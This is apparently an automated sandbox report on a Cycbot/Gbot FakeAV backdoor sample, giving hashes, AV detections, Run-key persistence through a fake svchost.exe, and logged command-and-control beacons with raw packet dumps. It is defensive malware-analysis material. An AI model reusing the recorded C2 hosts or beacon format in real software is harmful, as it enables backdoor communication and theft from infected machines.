Analysis Date2014-11-22 23:31:20
MD511368e0f685dd8a19fcc97d417fc324e
SHA10a3e3c0a35d64e8a19fe61a10dc404e0492d35ba

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c6366f0a1993b91fa362f9ec1bd93de4 sha1: 9099fda7323bc9c3dac26a5ae00210fd247e4c03 size: 56320
Section.rdata md5: 9c4b339a9e0230401cffbef34a0af759 sha1: 74fdd828682b13c417c189828bd9a75382e551c9 size: 4096
Section.data md5: 7af08d279a14e4d9361a1b88cab3f256 sha1: 5e64a1309c9cbe55cf4f1d13c67b3a907af335ae size: 38400
Section.rsrc md5: 5e828602a6d9775e437405b0afc50c46 sha1: 14f582eb78056e73d6c1f5caaaf9388ae29b2b31 size: 1024
Timestamp2005-10-15 17:27:01
VersionPrivateBuild: 1036
FileDescription: Windows Host Process
PEhashd9c54bb43acfcacea1c8314ad8f9706d0fdad34c
IMPhash21c14cbd4ec276700c46f24a2be304a2
AV360 SafeGen:Variant.Kazy.2225
AVAd-AwareGen:Variant.Kazy.2225
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.B.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Variant.Kazy.2225
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-215566
AVDr. WebTrojan.DownLoader1.34990
AVEmsisoftGen:Variant.Kazy.2225
AVEset (nod32)Win32/Kryptik.IAV
AVFortinetW32/FakeAV.BZD!tr
AVFrisk (f-prot)W32/Goolbot.B.gen!Eldorado
AVF-SecureGen:Variant.Kazy.2225
AVGrisoft (avg)Cryptic.BFI
AVIkarusTrojan.Win32.FakeAV
AVK7Trojan-Downloader ( 001c55311 )
AVKasperskyPacked.Win32.Krap.hy
AVMalwareBytesBackdoor.Gbot
AVMcafeeBackDoor-EXI
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Variant.Kazy.2225
AVRisingno_virus
AVSophosTroj/FakeAv-BWP
AVSymantecTrojan.FakeAV!gen39
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwww.google.com
Winsock DNSwww.pcdocpro.com
Winsock DNSblogsmonitoringservice.com
Winsock DNS127.0.0.1
Winsock DNSfindeffectivecasino.com
Winsock DNSbigtelevideochanel.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Network Details:

DNSpcdocpro.com
Type: A
209.59.161.20
DNSwww.google.com
Type: A
173.194.125.51
DNSwww.google.com
Type: A
173.194.125.52
DNSwww.google.com
Type: A
173.194.125.48
DNSwww.google.com
Type: A
173.194.125.49
DNSwww.google.com
Type: A
173.194.125.50
DNSprotectyourpc-11.com
Type: A
74.200.250.181
DNSwww.pcdocpro.com
Type: A
DNSbigtelevideochanel.com
Type: A
DNSfindeffectivecasino.com
Type: A
DNSblogsmonitoringservice.com
Type: A
HTTP GEThttp://www.pcdocpro.com/images/logo-3.jpg?tq=gP4aKydMn3SNnjFQM1TbKaCr%2BPy0e%2Ftjwr%2Fm7PIu8DP0ZfZ6bi7TXVsltreu1sPF3Sbia0UhghUDQPS2z10WC1kzg%2BmVFxp96CbuMiCs7bJEy7XM80ns0DTd9Qxx0VjUjDqR4h7Y13V%2BoqRFeo7eUGgsuooLrimRZcuTF7nr2%2Bh5blooBZZzJI0naQzqTea8DXQ9d2tvm3U%2Bx1D9NPoz9P2WoO5WSSneL63Wnc2stsXUUgKNrRRmXlPCCriYSGz9YOMmKzpp0jRDqunfBo8V%2FQnyPuY35CpkSa22wEvuhlrUdp%2F84dQIcYlu3hA7xNvYhoeMAWvDe6NOTX9q521FYHy%2BiKFthwtjt%2BrzizSxRqe52CGzr7VWaj1r4zNUx0NMelGw%2BhA%2Fk9GetwFe12VCL2X8hiA4Ie0bclXN8pg1%2B6vDgpg0BtgRRG%2F6Gg
User-Agent: gbot/2.3
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err073_2_2&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_4&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 209.59.161.20:80
Flows TCP192.168.1.1:1032 ➝ 173.194.125.51:80
Flows TCP192.168.1.1:1033 ➝ 173.194.125.51:80
Flows TCP192.168.1.1:1034 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1035 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1036 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1037 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1038 ➝ 74.200.250.181:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 6c6f676f   GET /images/logo
0x00000010 (00016)   2d332e6a 70673f74 713d6750 34614b79   -3.jpg?tq=gP4aKy
0x00000020 (00032)   644d6e33 534e6e6a 46514d31 54624b61   dMn3SNnjFQM1TbKa
0x00000030 (00048)   43722532 42507930 65253246 746a7772   Cr%2BPy0e%2Ftjwr
0x00000040 (00064)   2532466d 37504975 38445030 5a665a36   %2Fm7PIu8DP0ZfZ6
0x00000050 (00080)   62693754 5856736c 74726575 31735046   bi7TXVsltreu1sPF
0x00000060 (00096)   33536269 61305568 67685544 51505332   3Sbia0UhghUDQPS2
0x00000070 (00112)   7a313057 43316b7a 67253242 6d564678   z10WC1kzg%2BmVFx
0x00000080 (00128)   70393643 62754d69 43733762 4a457937   p96CbuMiCs7bJEy7
0x00000090 (00144)   584d3830 6e733044 54643951 78783056   XM80ns0DTd9Qxx0V
0x000000a0 (00160)   6a556a44 71523468 37593133 56253242   jUjDqR4h7Y13V%2B
0x000000b0 (00176)   6f715246 656f3765 55476773 756f6f4c   oqRFeo7eUGgsuooL
0x000000c0 (00192)   72696d52 5a637554 46376e72 32253242   rimRZcuTF7nr2%2B
0x000000d0 (00208)   6835626c 6f6f425a 5a7a4a49 306e6151   h5blooBZZzJI0naQ
0x000000e0 (00224)   7a715465 61384458 51396432 74766d33   zqTea8DXQ9d2tvm3
0x000000f0 (00240)   55253242 78314439 4e506f7a 39503257   U%2Bx1D9NPoz9P2W
0x00000100 (00256)   6f4f3557 53536e65 4c363357 6e633273   oO5WSSneL63Wnc2s
0x00000110 (00272)   74735855 55674b4e 7252526d 586c5043   tsXUUgKNrRRmXlPC
0x00000120 (00288)   43726959 53477a39 594f4d6d 4b7a7070   CriYSGz9YOMmKzpp
0x00000130 (00304)   306a5244 71756e66 426f3856 25324651   0jRDqunfBo8V%2FQ
0x00000140 (00320)   6e795075 59333543 706b5361 32327745   nyPuY35CpkSa22wE
0x00000150 (00336)   7675686c 72556470 25324638 34645149   vuhlrUdp%2F84dQI
0x00000160 (00352)   63596c75 33684137 784e7659 686f654d   cYlu3hA7xNvYhoeM
0x00000170 (00368)   41577644 65364e4f 54583971 35323146   AWvDe6NOTX9q521F
0x00000180 (00384)   59487925 3242694b 46746877 746a7425   YHy%2BiKFthwtjt%
0x00000190 (00400)   3242727a 697a5378 52716535 3243477a   2BrzizSxRqe52CGz
0x000001a0 (00416)   72375657 616a3172 347a4e55 78304e4d   r7VWaj1r4zNUx0NM
0x000001b0 (00432)   656c4777 25324268 41253246 6b394765   elGw%2BhA%2Fk9Ge
0x000001c0 (00448)   74774665 31325643 4c325838 68694134   twFe12VCL2X8hiA4
0x000001d0 (00464)   49653062 636c584e 38706731 25324236   Ie0bclXN8pg1%2B6
0x000001e0 (00480)   76446770 67304274 67525247 25324636   vDgpg0BtgRRG%2F6
0x000001f0 (00496)   47672048 5454502f 312e300d 0a436f6e   Gg HTTP/1.0..Con
0x00000200 (00512)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000210 (00528)   486f7374 3a207777 772e7063 646f6370   Host: www.pcdocp
0x00000220 (00544)   726f2e63 6f6d0d0a 41636365 70743a20   ro.com..Accept: 
0x00000230 (00560)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000240 (00576)   2067626f 742f322e 330d0a0d 0a          gbot/2.3....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 38445030 5a665a36    */*....8DP0ZfZ6
0x00000050 (00080)   62693754 5856736c 74726575 31735046   bi7TXVsltreu1sPF
0x00000060 (00096)   33536269 61305568 67685544 51505332   3Sbia0UhghUDQPS2
0x00000070 (00112)   7a313057 43316b7a 67253242 6d564678   z10WC1kzg%2BmVFx
0x00000080 (00128)   70393643 62754d69 43733762 4a457937   p96CbuMiCs7bJEy7
0x00000090 (00144)   584d3830 6e733044 54643951 78783056   XM80ns0DTd9Qxx0V
0x000000a0 (00160)   6a556a44 71523468 37593133 56253242   jUjDqR4h7Y13V%2B
0x000000b0 (00176)   6f715246 656f3765 55476773 756f6f4c   oqRFeo7eUGgsuooL
0x000000c0 (00192)   72696d52 5a637554 46376e72 32253242   rimRZcuTF7nr2%2B
0x000000d0 (00208)   6835626c 6f6f425a 5a7a4a49 306e6151   h5blooBZZzJI0naQ
0x000000e0 (00224)   7a715465 61384458 51396432 74766d33   zqTea8DXQ9d2tvm3
0x000000f0 (00240)   55253242 78314439 4e506f7a 39503257   U%2Bx1D9NPoz9P2W
0x00000100 (00256)   6f4f3557 53536e65 4c363357 6e633273   oO5WSSneL63Wnc2s
0x00000110 (00272)   74735855 55674b4e 7252526d 586c5043   tsXUUgKNrRRmXlPC
0x00000120 (00288)   43726959 53477a39 594f4d6d 4b7a7070   CriYSGz9YOMmKzpp
0x00000130 (00304)   306a5244 71756e66 426f3856 25324651   0jRDqunfBo8V%2FQ
0x00000140 (00320)   6e795075 59333543 706b5361 32327745   nyPuY35CpkSa22wE
0x00000150 (00336)   7675686c 72556470 25324638 34645149   vuhlrUdp%2F84dQI
0x00000160 (00352)   63596c75 33684137 784e7659 686f654d   cYlu3hA7xNvYhoeM
0x00000170 (00368)   41577644 65364e4f 54583971 35323146   AWvDe6NOTX9q521F
0x00000180 (00384)   59487925 3242694b 46746877 746a7425   YHy%2BiKFthwtjt%
0x00000190 (00400)   3242727a 697a5378 52716535 3243477a   2BrzizSxRqe52CGz
0x000001a0 (00416)   72375657 616a3172 347a4e55 78304e4d   r7VWaj1r4zNUx0NM
0x000001b0 (00432)   656c4777 25324268 41253246 6b394765   elGw%2BhA%2Fk9Ge
0x000001c0 (00448)   74774665 31325643 4c325838 68694134   twFe12VCL2X8hiA4
0x000001d0 (00464)   49653062 636c584e 38706731 25324236   Ie0bclXN8pg1%2B6
0x000001e0 (00480)   76446770 67304274 67525247 25324636   vDgpg0BtgRRG%2F6
0x000001f0 (00496)   47672048 5454502f 312e300d 0a436f6e   Gg HTTP/1.0..Con
0x00000200 (00512)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000210 (00528)   486f7374 3a207777 772e7063 646f6370   Host: www.pcdocp
0x00000220 (00544)   726f2e63 6f6d0d0a 41636365 70743a20   ro.com..Accept: 
0x00000230 (00560)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000240 (00576)   2067626f 742f322e 330d0a0d 0a          gbot/2.3....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 33267379 7374656d   ype=g_v43&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a6e65 4c363357 6e633273   se....neL63Wnc2s
0x00000110 (00272)   74735855 55674b4e 7252526d 586c5043   tsXUUgKNrRRmXlPC
0x00000120 (00288)   43726959 53477a39 594f4d6d 4b7a7070   CriYSGz9YOMmKzpp
0x00000130 (00304)   306a5244 71756e66 426f3856 25324651   0jRDqunfBo8V%2FQ
0x00000140 (00320)   6e795075 59333543 706b5361 32327745   nyPuY35CpkSa22wE
0x00000150 (00336)   7675686c 72556470 25324638 34645149   vuhlrUdp%2F84dQI
0x00000160 (00352)   63596c75 33684137 784e7659 686f654d   cYlu3hA7xNvYhoeM
0x00000170 (00368)   41577644 65364e4f 54583971 35323146   AWvDe6NOTX9q521F
0x00000180 (00384)   59487925 3242694b 46746877 746a7425   YHy%2BiKFthwtjt%
0x00000190 (00400)   3242727a 697a5378 52716535 3243477a   2BrzizSxRqe52CGz
0x000001a0 (00416)   72375657 616a3172 347a4e55 78304e4d   r7VWaj1r4zNUx0NM
0x000001b0 (00432)   656c4777 25324268 41253246 6b394765   elGw%2BhA%2Fk9Ge
0x000001c0 (00448)   74774665 31325643 4c325838 68694134   twFe12VCL2X8hiA4
0x000001d0 (00464)   49653062 636c584e 38706731 25324236   Ie0bclXN8pg1%2B6
0x000001e0 (00480)   76446770 67304274 67525247 25324636   vDgpg0BtgRRG%2F6
0x000001f0 (00496)   47672048 5454502f 312e300d 0a436f6e   Gg HTTP/1.0..Con
0x00000200 (00512)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000210 (00528)   486f7374 3a207777 772e7063 646f6370   Host: www.pcdocp
0x00000220 (00544)   726f2e63 6f6d0d0a 41636365 70743a20   ro.com..Accept: 
0x00000230 (00560)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000240 (00576)   2067626f 742f322e 330d0a0d 0a          gbot/2.3....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 33267379 7374656d   ype=g_v43&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 385f325f   status=err088_2_
0x00000070 (00112)   30266e3d 30266578 7472613d 30204854   0&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 6e633273   n: close....nc2s
0x00000110 (00272)   74735855 55674b4e 7252526d 586c5043   tsXUUgKNrRRmXlPC
0x00000120 (00288)   43726959 53477a39 594f4d6d 4b7a7070   CriYSGz9YOMmKzpp
0x00000130 (00304)   306a5244 71756e66 426f3856 25324651   0jRDqunfBo8V%2FQ
0x00000140 (00320)   6e795075 59333543 706b5361 32327745   nyPuY35CpkSa22wE
0x00000150 (00336)   7675686c 72556470 25324638 34645149   vuhlrUdp%2F84dQI
0x00000160 (00352)   63596c75 33684137 784e7659 686f654d   cYlu3hA7xNvYhoeM
0x00000170 (00368)   41577644 65364e4f 54583971 35323146   AWvDe6NOTX9q521F
0x00000180 (00384)   59487925 3242694b 46746877 746a7425   YHy%2BiKFthwtjt%
0x00000190 (00400)   3242727a 697a5378 52716535 3243477a   2BrzizSxRqe52CGz
0x000001a0 (00416)   72375657 616a3172 347a4e55 78304e4d   r7VWaj1r4zNUx0NM
0x000001b0 (00432)   656c4777 25324268 41253246 6b394765   elGw%2BhA%2Fk9Ge
0x000001c0 (00448)   74774665 31325643 4c325838 68694134   twFe12VCL2X8hiA4
0x000001d0 (00464)   49653062 636c584e 38706731 25324236   Ie0bclXN8pg1%2B6
0x000001e0 (00480)   76446770 67304274 67525247 25324636   vDgpg0BtgRRG%2F6
0x000001f0 (00496)   47672048 5454502f 312e300d 0a436f6e   Gg HTTP/1.0..Con
0x00000200 (00512)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000210 (00528)   486f7374 3a207777 772e7063 646f6370   Host: www.pcdocp
0x00000220 (00544)   726f2e63 6f6d0d0a 41636365 70743a20   ro.com..Accept: 
0x00000230 (00560)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000240 (00576)   2067626f 742f322e 330d0a0d 0a          gbot/2.3....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 33267379 7374656d   ype=g_v43&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723037 335f325f   status=err073_2_
0x00000070 (00112)   32266e3d 30266578 7472613d 30204854   2&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 6e633273   n: close....nc2s
0x00000110 (00272)   74735855 55674b4e 7252526d 586c5043   tsXUUgKNrRRmXlPC
0x00000120 (00288)   43726959 53477a39 594f4d6d 4b7a7070   CriYSGz9YOMmKzpp
0x00000130 (00304)   306a5244 71756e66 426f3856 25324651   0jRDqunfBo8V%2FQ
0x00000140 (00320)   6e795075 59333543 706b5361 32327745   nyPuY35CpkSa22wE
0x00000150 (00336)   7675686c 72556470 25324638 34645149   vuhlrUdp%2F84dQI
0x00000160 (00352)   63596c75 33684137 784e7659 686f654d   cYlu3hA7xNvYhoeM
0x00000170 (00368)   41577644 65364e4f 54583971 35323146   AWvDe6NOTX9q521F
0x00000180 (00384)   59487925 3242694b 46746877 746a7425   YHy%2BiKFthwtjt%
0x00000190 (00400)   3242727a 697a5378 52716535 3243477a   2BrzizSxRqe52CGz
0x000001a0 (00416)   72375657 616a3172 347a4e55 78304e4d   r7VWaj1r4zNUx0NM
0x000001b0 (00432)   656c4777 25324268 41253246 6b394765   elGw%2BhA%2Fk9Ge
0x000001c0 (00448)   74774665 31325643 4c325838 68694134   twFe12VCL2X8hiA4
0x000001d0 (00464)   49653062 636c584e 38706731 25324236   Ie0bclXN8pg1%2B6
0x000001e0 (00480)   76446770 67304274 67525247 25324636   vDgpg0BtgRRG%2F6
0x000001f0 (00496)   47672048 5454502f 312e300d 0a436f6e   Gg HTTP/1.0..Con
0x00000200 (00512)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000210 (00528)   486f7374 3a207777 772e7063 646f6370   Host: www.pcdocp
0x00000220 (00544)   726f2e63 6f6d0d0a 41636365 70743a20   ro.com..Accept: 
0x00000230 (00560)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000240 (00576)   2067626f 742f322e 330d0a0d 0a          gbot/2.3....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 33267379 7374656d   ype=g_v43&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 0d0a0d0a 6e633273   lose........nc2s
0x00000110 (00272)   74735855 55674b4e 7252526d 586c5043   tsXUUgKNrRRmXlPC
0x00000120 (00288)   43726959 53477a39 594f4d6d 4b7a7070   CriYSGz9YOMmKzpp
0x00000130 (00304)   306a5244 71756e66 426f3856 25324651   0jRDqunfBo8V%2FQ
0x00000140 (00320)   6e795075 59333543 706b5361 32327745   nyPuY35CpkSa22wE
0x00000150 (00336)   7675686c 72556470 25324638 34645149   vuhlrUdp%2F84dQI
0x00000160 (00352)   63596c75 33684137 784e7659 686f654d   cYlu3hA7xNvYhoeM
0x00000170 (00368)   41577644 65364e4f 54583971 35323146   AWvDe6NOTX9q521F
0x00000180 (00384)   59487925 3242694b 46746877 746a7425   YHy%2BiKFthwtjt%
0x00000190 (00400)   3242727a 697a5378 52716535 3243477a   2BrzizSxRqe52CGz
0x000001a0 (00416)   72375657 616a3172 347a4e55 78304e4d   r7VWaj1r4zNUx0NM
0x000001b0 (00432)   656c4777 25324268 41253246 6b394765   elGw%2BhA%2Fk9Ge
0x000001c0 (00448)   74774665 31325643 4c325838 68694134   twFe12VCL2X8hiA4
0x000001d0 (00464)   49653062 636c584e 38706731 25324236   Ie0bclXN8pg1%2B6
0x000001e0 (00480)   76446770 67304274 67525247 25324636   vDgpg0BtgRRG%2F6
0x000001f0 (00496)   47672048 5454502f 312e300d 0a436f6e   Gg HTTP/1.0..Con
0x00000200 (00512)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000210 (00528)   486f7374 3a207777 772e7063 646f6370   Host: www.pcdocp
0x00000220 (00544)   726f2e63 6f6d0d0a 41636365 70743a20   ro.com..Accept: 
0x00000230 (00560)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000240 (00576)   2067626f 742f322e 330d0a0d 0a          gbot/2.3....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 33267379 7374656d   ype=g_v43&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f325f   status=err095_2_
0x00000070 (00112)   34266e3d 30266578 7472613d 30204854   4&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
